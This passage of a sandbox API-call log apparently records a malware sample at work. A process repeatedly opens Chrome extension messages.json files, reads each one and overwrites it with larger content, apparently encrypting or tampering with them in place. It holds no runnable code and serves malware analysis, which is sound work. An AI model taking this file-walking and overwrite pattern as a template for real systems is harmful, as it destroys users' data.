lpNumberOfBytesWritten=0x311f2d0*=0x974, lpOverlapped=0x0) returned 1 [0165.161] CloseHandle (hObject=0x210) returned 1 [0165.161] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0165.590] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.590] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xf9 [0165.590] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.590] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.590] ReleaseMutex (hMutex=0x168) returned 1 [0165.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.590] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.590] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0xf9, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x311f2bc*=0xf9, lpOverlapped=0x0) returned 1 [0165.632] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0165.639] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x681, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x681, lpOverlapped=0x0) returned 1 [0165.639] CloseHandle (hObject=0x1d8) returned 1 [0165.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0165.641] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.641] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xfc [0165.641] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.641] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.641] ReleaseMutex (hMutex=0x168) returned 1 [0165.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.641] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.641] ReadFile (in: hFile=0x1d8, lpBuffer=0x1eeb1f8, nNumberOfBytesToRead=0xfc, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eeb1f8*, lpNumberOfBytesRead=0x311f2bc*=0xfc, lpOverlapped=0x0) returned 1 [0165.643] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0165.643] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x684, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x684, lpOverlapped=0x0) returned 1 [0165.643] CloseHandle (hObject=0x1d8) returned 1 [0165.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0165.644] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.644] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x119 [0165.644] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.644] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.644] ReleaseMutex (hMutex=0x168) returned 1 [0165.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.645] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ecd5c8, nNumberOfBytesToRead=0x119, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ecd5c8*, lpNumberOfBytesRead=0x311f2bc*=0x119, lpOverlapped=0x0) returned 1 [0165.646] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0165.646] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6a1, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x6a1, lpOverlapped=0x0) returned 1 [0165.646] CloseHandle (hObject=0x1d8) returned 1 [0165.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0165.648] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.648] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x108 [0165.648] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.648] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.648] ReleaseMutex (hMutex=0x168) returned 1 [0165.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.648] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef2138, nNumberOfBytesToRead=0x108, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2138*, lpNumberOfBytesRead=0x311f2bc*=0x108, lpOverlapped=0x0) returned 1 [0165.649] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0165.650] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x690, lpOverlapped=0x0) returned 1 [0165.655] CloseHandle (hObject=0x1d8) returned 1 [0165.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0165.657] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.657] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x10e [0165.657] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.657] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.657] ReleaseMutex (hMutex=0x168) returned 1 [0165.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.657] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef2138, nNumberOfBytesToRead=0x10e, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2138*, lpNumberOfBytesRead=0x311f2bc*=0x10e, lpOverlapped=0x0) returned 1 [0165.659] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0165.659] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x696, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x311f2d0*=0x696, lpOverlapped=0x0) returned 1 [0165.659] CloseHandle (hObject=0x1d8) returned 1 [0165.660] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0165.661] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.661] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb3 [0165.661] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.661] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.661] ReleaseMutex (hMutex=0x168) returned 1 [0165.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.661] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35b98, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35b98*, lpNumberOfBytesRead=0x311f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0165.663] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0165.663] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0165.663] CloseHandle (hObject=0x1d8) returned 1 [0165.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0165.665] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.665] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb3 [0165.665] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.665] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.665] ReleaseMutex (hMutex=0x168) returned 1 [0165.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.665] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35b98, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35b98*, lpNumberOfBytesRead=0x311f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0165.667] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0165.667] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0165.667] CloseHandle (hObject=0x1d8) returned 1 [0165.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0165.668] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.668] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb3 [0165.668] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0165.669] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0165.669] ReleaseMutex (hMutex=0x168) returned 1 [0165.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0165.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0165.669] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35b98, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35b98*, lpNumberOfBytesRead=0x311f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0166.119] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.120] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0166.125] CloseHandle (hObject=0x1d8) returned 1 [0166.126] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.127] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.127] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb3 [0166.127] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.129] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.167] ReleaseMutex (hMutex=0x168) returned 1 [0166.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.167] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35b98, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35b98*, lpNumberOfBytesRead=0x311f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0166.168] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.168] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0166.170] CloseHandle (hObject=0x1d8) returned 1 [0166.170] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0166.171] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.171] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xb3 [0166.171] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0166.172] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0166.172] ReleaseMutex (hMutex=0x168) returned 1 [0166.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0166.172] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f35b98, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f35b98*, lpNumberOfBytesRead=0x311f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0166.173] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0166.173] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x311f2d0*=0x63b, lpOverlapped=0x0) returned 1 